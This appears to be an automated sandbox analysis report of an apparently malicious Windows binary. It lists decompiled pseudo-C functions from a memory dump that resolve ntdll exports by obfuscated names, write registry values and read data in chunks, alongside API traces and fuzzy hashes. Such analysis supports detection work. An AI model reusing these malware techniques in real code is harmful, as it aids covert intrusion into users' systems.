API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID: @ht
API String ID: 3850880919-1371871952
Opcode ID: 42302e453de44ef7fb44ce9c3eafa2a9726ffeb518a3af45737d99b3bcdcdbb9
Instruction ID: b396d9cd7d568bd4a8cf92f147c79015584e578f7721efd2cf6c13c6993cc63c
Opcode Fuzzy Hash: 42302e453de44ef7fb44ce9c3eafa2a9726ffeb518a3af45737d99b3bcdcdbb9
Instruction Fuzzy Hash: C021F576900209FFCB11DFE8C994DEEBBB9EF44244B5484AAE505E7200EB30AB45DF21

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1974, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E02BD1974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2bdd2e0; // 0x3b6a5a8
				_t1 = _t9 + 0x2bde62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02BD43A8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02BD75F6(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02BD5601(_t34, _t41, _a8);
						E02BD4AAB(_t41);
						_t42 = E02BD756E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02BD4AAB(_t36);
							_t36 = _t42;
						}
						_t43 = E02BD26DD(_t36, _t33);
						if(_t43 != 0) {
							E02BD4AAB(_t36);
							_t36 = _t43;
						}
					}
					E02BD4AAB(_t28);
				}
				return _t36;
			}

0x02bd1974
0x02bd1977
0x02bd1978
0x02bd1980
0x02bd1987
0x02bd198e
0x02bd1992
0x02bd1998
0x02bd199f
0x02bd19a4
0x02bd19b6
0x02bd19ba
0x02bd19be
0x02bd19c4
0x02bd19c9
0x02bd19d9
0x02bd19db
0x02bd19f2
0x02bd19f6
0x02bd19f9
0x02bd19fe
0x02bd19fe
0x02bd1a07
0x02bd1a0b
0x02bd1a0e
0x02bd1a13
0x02bd1a13
0x02bd1a0b
0x02bd1a16
0x02bd1a16
0x02bd1a21

APIs

Part of subcall function 02BD43A8: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,02BD198E,253D7325,00000000,00000000,7691C740,?,?,02BD4653,?), ref: 02BD440F
Part of subcall function 02BD43A8: sprintf.NTDLL ref: 02BD4430

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,02BD4653,?,067495B0), ref: 02BD199F
lstrlen.KERNEL32(?,?,?,02BD4653,?,067495B0), ref: 02BD19A7

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

strcpy.NTDLL ref: 02BD19BE
lstrcat.KERNEL32(00000000,?), ref: 02BD19C9

Part of subcall function 02BD5601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02BD19D8,00000000,?,?,?,02BD4653,?,067495B0), ref: 02BD5618

Part of subcall function 02BD4AAB: HeapFree.KERNEL32(00000000,00000000,02BD5012,00000000,?,?,00000000), ref: 02BD4AB7

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BD4653,?,067495B0), ref: 02BD19E6

Part of subcall function 02BD756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02BD19F2,00000000,?,?,02BD4653,?,067495B0), ref: 02BD7578
Part of subcall function 02BD756E: _snprintf.NTDLL ref: 02BD75D6

Strings

=, xrefs: 02BD19E0

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: c3eb01341a2f26cc7505a45a7a0593d4d8f9992f5ac6b17f374612c3f803c693
Instruction ID: 4bf28aaf686498ed7acea97fe3cd7cb1ad7667ef0abd2a40205e26abce1d105c
Opcode Fuzzy Hash: c3eb01341a2f26cc7505a45a7a0593d4d8f9992f5ac6b17f374612c3f803c693
Instruction Fuzzy Hash: DB11A333911625678712B7A89C84CEE3BBEDF857A43054096FA19EB101FE34C9029BA9

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1A24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD1A24(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2bdd2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2bdd294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2bdd290 = _t6;
					 *0x2bdd29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2bdd28c = _t7;
					if(_t7 == 0) {
						 *0x2bdd28c =  *0x2bdd28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02bd1a2c
0x02bd1a32
0x02bd1a39
0x00000000
0x02bd1a93
0x02bd1a3b
0x02bd1a43
0x02bd1a50
0x02bd1a50
0x02bd1a90
0x00000000
0x02bd1a90
0x02bd1a52
0x02bd1a52
0x02bd1a57
0x02bd1a69
0x02bd1a6e
0x02bd1a74
0x02bd1a7a
0x02bd1a81
0x02bd1a83
0x02bd1a83
0x00000000
0x02bd1a8a
0x02bd1a4c
0x00000000
0x00000000
0x02bd1a4e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02BD2669,?,?,00000001,?,?,?,02BD1900,?), ref: 02BD1A2C
GetVersion.KERNEL32(?,00000001,?,?,?,02BD1900,?), ref: 02BD1A3B
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02BD1900,?), ref: 02BD1A57
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02BD1900,?), ref: 02BD1A74
GetLastError.KERNEL32(?,00000001,?,?,?,02BD1900,?), ref: 02BD1A93

Strings

@MtNt, xrefs: 02BD1A93

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MtNt
API String ID: 2270775618-3251738875
Opcode ID: f227d81f35009bf9a29c12826b742f82fc8713ce1353cc69a4f0680424d37ea1
Instruction ID: dca59495b455bb70fc269f14c7e25b873cadcc3088c5df082b4c9ca2ccea72b5
Opcode Fuzzy Hash: f227d81f35009bf9a29c12826b742f82fc8713ce1353cc69a4f0680424d37ea1
Instruction Fuzzy Hash: A4F01975AE2303ABE7248B68A9297E93F65E704791F40495AE5AAC71C0F770C061CF25

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1A9C, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02BD1AF6
SysAllocString.OLEAUT32(0070006F), ref: 02BD1B0A
SysAllocString.OLEAUT32(00000000), ref: 02BD1B1C
SysFreeString.OLEAUT32(00000000), ref: 02BD1B84
SysFreeString.OLEAUT32(00000000), ref: 02BD1B93
SysFreeString.OLEAUT32(00000000), ref: 02BD1B9E

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 45f7d9313b97c9adc1721215d17fd0e8e070f69b9796854d52df59cd3be5b416
Instruction ID: 63c080c83c78fb82e8241e848d38dfc1ae497b2ee5ebaf103e4ee25c03455ee1
Opcode Fuzzy Hash: 45f7d9313b97c9adc1721215d17fd0e8e070f69b9796854d52df59cd3be5b416
Instruction Fuzzy Hash: 3E416D36D10609AFDB01DFBCD844ADEB7BAEF89310F144466E914EB210EB719905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4837, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD4837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02BD75F6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2bdd2e0; // 0x3b6a5a8
					_t1 = _t23 + 0x2bde11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2bdd2e0; // 0x3b6a5a8
					_t2 = _t26 + 0x2bde782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02BD4AAB(_t54);
					} else {
						_t30 =  *0x2bdd2e0; // 0x3b6a5a8
						_t5 = _t30 + 0x2bde76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2bdd2e0; // 0x3b6a5a8
							_t7 = _t33 + 0x2bde4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2bdd2e0; // 0x3b6a5a8
								_t9 = _t36 + 0x2bde406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2bdd2e0; // 0x3b6a5a8
									_t11 = _t39 + 0x2bde792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02BD9269(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02bd4846
0x02bd484a
0x02bd490c
0x02bd4850
0x02bd4850
0x02bd4855
0x02bd4868
0x02bd486a
0x02bd486f
0x02bd4877
0x02bd487e
0x02bd4880
0x02bd4885
0x02bd4904
0x02bd4905
0x02bd4887
0x02bd4887
0x02bd488c
0x02bd4894
0x02bd4896
0x02bd489b
0x00000000
0x02bd489d
0x02bd489d
0x02bd48a2
0x02bd48aa
0x02bd48ac
0x02bd48b1
0x00000000
0x02bd48b3
0x02bd48b3
0x02bd48b8
0x02bd48c0
0x02bd48c2
0x02bd48c7
0x00000000
0x02bd48c9
0x02bd48c9
0x02bd48ce
0x02bd48d6
0x02bd48d8
0x02bd48dd
0x00000000
0x02bd48df
0x02bd48e5
0x02bd48ea
0x02bd48f1
0x02bd48f6
0x02bd48fb
0x00000000
0x02bd48fd
0x02bd4900
0x02bd4900
0x02bd48fb
0x02bd48dd
0x02bd48c7
0x02bd48b1
0x02bd489b
0x02bd4885
0x02bd491a

APIs

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD101C,?,00000001,?,?,00000000,00000000), ref: 02BD485C
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD487E
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD4894
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD48AA
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD48C0
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD48D6

Part of subcall function 02BD9269: memset.NTDLL ref: 02BD92E8

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 2b1a07e79feb0f973d9651474d9fc5bebf6b7d427599585510f64635eb1e30fa
Instruction ID: 1b95b367e7e2126f8d1251e0ab7b955e8710a59db30ad03db13cd82945f8831d
Opcode Fuzzy Hash: 2b1a07e79feb0f973d9651474d9fc5bebf6b7d427599585510f64635eb1e30fa
Instruction Fuzzy Hash: B52128B154160AAFDB20DF6AC844EEAB7FCFF04384702446AE685DB241F774EA05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD282B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02BD282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2bdd37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E02BD1922( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02BD5C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02BD4AAB(_a8);
						goto L29;
					}
					_t64 =  *0x2bdd2b0; // 0x6749b10
					_t16 = _t64 + 0xc; // 0x6749bde
					_t65 = E02BD1922(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02bdc0
						if(E02BD4A6D(_t97,  *_t33, _t91, _a8,  *0x2bdd374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2bdd2e0; // 0x3b6a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2bdea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2bdea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E02BD5F64(_t69,  *0x2bdd374,  *0x2bdd378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2bdd2e0; // 0x3b6a5a8
									_t44 = _t71 + 0x2bde83e; // 0x74666f53
									_t73 = E02BD1922(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02bdc0
										E02BD5DDA( *_t47, _t91, _a8,  *0x2bdd378, _a24);
										_t49 = _t101 + 0x10; // 0x3d02bdc0
										E02BD5DDA( *_t49, _t91, _t99,  *0x2bdd370, _a16);
										E02BD4AAB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02bdc0
									E02BD5DDA( *_t40, _t91, _a8,  *0x2bdd378, _a24);
									_t43 = _t101 + 0x10; // 0x3d02bdc0
									E02BD5DDA( *_t43, _t91, _a8,  *0x2bdd370, _a16);
								}
								if( *_t101 != 0) {
									E02BD4AAB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02bdc0
					_t81 = E02BD63F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02bdc0
							E02BD4A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02BD4AAB(_t100);
						_t98 = _a16;
					}
					E02BD4AAB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02BDA938(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2bdd37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x02bd282b
0x02bd2834
0x02bd283b
0x02bd2840
0x02bd28ad
0x02bd28b3
0x02bd28b8
0x02bd28bf
0x02bd28c4
0x02bd28c9
0x02bd2a34
0x02bd2a3b
0x02bd2a3b
0x02bd2a40
0x02bd2a42
0x02bd2a42
0x02bd2a4b
0x02bd2a4b
0x02bd28cf
0x02bd28db
0x02bd2a2a
0x02bd2a2d
0x00000000
0x02bd2a2d
0x02bd28e1
0x02bd28e6
0x02bd28e9
0x02bd28ee
0x02bd28f3
0x02bd293c
0x02bd293c
0x02bd294f
0x02bd2959
0x02bd295f
0x02bd2966
0x02bd2970
0x02bd2970
0x02bd2968
0x02bd2968
0x02bd2968
0x02bd2968
0x02bd2992
0x02bd299a
0x02bd29c8
0x02bd29cd
0x02bd29d4
0x02bd29d9
0x02bd29dd
0x02bd2a0f
0x02bd29df
0x02bd29ec
0x02bd29ef
0x02bd29ff
0x02bd2a02
0x02bd2a08
0x02bd2a08
0x02bd299c
0x02bd29a9
0x02bd29ac
0x02bd29be
0x02bd29c1
0x02bd29c1
0x02bd2a19
0x02bd2a25
0x02bd2a1b
0x02bd2a1e
0x02bd2a1e
0x02bd2a19
0x02bd2992
0x00000000
0x02bd2959
0x02bd2902
0x02bd2905
0x02bd290c
0x02bd2912
0x02bd2915
0x02bd2917
0x02bd2923
0x02bd2926
0x02bd2926
0x02bd292c
0x02bd2931
0x02bd2931
0x02bd2937
0x00000000
0x02bd2937
0x02bd2845
0x00000000
0x02bd286c
0x02bd286c
0x02bd2878
0x02bd288b
0x02bd2891
0x02bd2899
0x00000000
0x02bd2899

APIs

StrChrA.SHLWAPI(02BD2197,0000005F,00000000,00000000,00000104), ref: 02BD285E
lstrcpy.KERNEL32(?,?), ref: 02BD288B

Part of subcall function 02BD1922: lstrlen.KERNEL32(?,00000000,06749B10,00000000,02BD74FF,06749CEE,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD1929
Part of subcall function 02BD1922: mbstowcs.NTDLL ref: 02BD1952
Part of subcall function 02BD1922: memset.NTDLL ref: 02BD1964

Part of subcall function 02BD5DDA: lstrlenW.KERNEL32(?,?,?,02BD29F4,3D02BDC0,80000002,02BD2197,02BD258B,74666F53,4D4C4B48,02BD258B,?,3D02BDC0,80000002,02BD2197,?), ref: 02BD5DFF

Part of subcall function 02BD4AAB: HeapFree.KERNEL32(00000000,00000000,02BD5012,00000000,?,?,00000000), ref: 02BD4AB7

lstrcpy.KERNEL32(?,00000000), ref: 02BD28AD

Strings

(, xrefs: 02BD290E
\, xrefs: 02BD2891

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 5a15ce143fea8e811a18aaa8c6ee02ca69813be593536bb2bd5549210d01f156
Instruction ID: e9835c0b756f19769ded38b1dbf31fe12ab3b0b6790212394c231cf7584b7966
Opcode Fuzzy Hash: 5a15ce143fea8e811a18aaa8c6ee02ca69813be593536bb2bd5549210d01f156
Instruction Fuzzy Hash: DA51487250060ABFDB229FA0D840EEA3BBAFF04354F0085A5FA6597161F735D925DF10

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4F07, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E02BD4F07(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x2bdd130() != 0) {
								_v8 = 8;
							} else {
								_t47 = E02BD75F6(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x2bdd2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E02BD4AAB(_v20);
											if(_v8 == 0) {
												_v8 = E02BD3B3F(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E02BD121A(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x02bd4f08
0x02bd4f0e
0x02bd4f19
0x02bd4f19
0x02bd4f1b
0x02bd7613
0x02bd7616
0x02bd761f
0x02bd7622
0x02bd7625
0x02bd762d
0x02bd772b
0x02bd7731
0x02bd7739
0x02bd773b
0x00000000
0x02bd773b
0x02bd7633
0x02bd7636
0x02bd773e
0x02bd773e
0x02bd763c
0x02bd763f
0x02bd7640
0x02bd7642
0x02bd764b
0x02bd7722
0x02bd7651
0x02bd7657
0x02bd765c
0x02bd7661
0x02bd7710
0x02bd7667
0x00000000
0x02bd7667
0x02bd7667
0x02bd7667
0x02bd7667
0x02bd766c
0x02bd766e
0x02bd766e
0x02bd767b
0x02bd7683
0x00000000
0x00000000
0x02bd7685
0x02bd7692
0x02bd7698
0x02bd7698
0x02bd769b
0x00000000
0x00000000
0x02bd769d
0x02bd76a8
0x02bd76bc
0x02bd76f2
0x02bd76be
0x02bd76be
0x02bd76c5
0x02bd76cd
0x00000000
0x02bd76cf
0x02bd76cf
0x02bd76d5
0x02bd76dd
0x02bd76e4
0x00000000
0x02bd76e4
0x02bd76dd
0x02bd76cd
0x02bd76f5
0x02bd76f8
0x02bd7700
0x02bd770b
0x02bd770b
0x00000000
0x02bd7700
0x02bd76a5
0x00000000
0x02bd76e7
0x02bd76e7
0x00000000
0x02bd76f0
0x02bd7717
0x02bd7717
0x02bd771d
0x02bd771d
0x02bd764b
0x02bd7636
0x02bd7748
0x02bd4f10
0x02bd4f10
0x02bd4f17
0x02bd4f22
0x00000000
0x00000000
0x00000000
0x02bd4f17

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 02BD76AF
GetLastError.KERNEL32 ref: 02BD76CF

Part of subcall function 02BD121A: wcstombs.NTDLL ref: 02BD12DC

Strings

@MtNt, xrefs: 02BD769F, 02BD76CF, 02BD772B

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID: @MtNt
API String ID: 2344289193-3251738875
Opcode ID: fb2ded7cc793ba0e73923398c9311eb8d42fdcf9d6d17432e4a165bd5dfcb15e
Instruction ID: 817032c27c2ce2ad5ca5008bbdaef36d66bff5a61e0f1ac7fb3afe24e7e4221d
Opcode Fuzzy Hash: fb2ded7cc793ba0e73923398c9311eb8d42fdcf9d6d17432e4a165bd5dfcb15e
Instruction Fuzzy Hash: DF41EA75D01219EFDB10AFA8D984AEEFBB9FB04345F5048AAE402E7150FB309A44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4B98, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02BD4B98() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2bdd364; // 0x67495b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2bdd364; // 0x67495b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2bdd364; // 0x67495b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2bde823) {
					HeapFree( *0x2bdd270, 0, _t10);
					_t7 =  *0x2bdd364; // 0x67495b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02bd4b98
0x02bd4ba1
0x02bd4bb1
0x02bd4bb1
0x02bd4bb6
0x02bd4bbb
0x00000000
0x00000000
0x02bd4bab
0x02bd4bab
0x02bd4bbd
0x02bd4bc2
0x02bd4bc6
0x02bd4bd9
0x02bd4bdf
0x02bd4bdf
0x02bd4be8
0x02bd4bea
0x02bd4bee
0x02bd4bf4

APIs

RtlEnterCriticalSection.NTDLL(06749570), ref: 02BD4BA1
Sleep.KERNEL32(0000000A,?,02BD5390), ref: 02BD4BAB
HeapFree.KERNEL32(00000000,?,?,02BD5390), ref: 02BD4BD9
RtlLeaveCriticalSection.NTDLL(06749570), ref: 02BD4BEE

Strings

Ut, xrefs: 02BD4BD9

Memory Dump Source

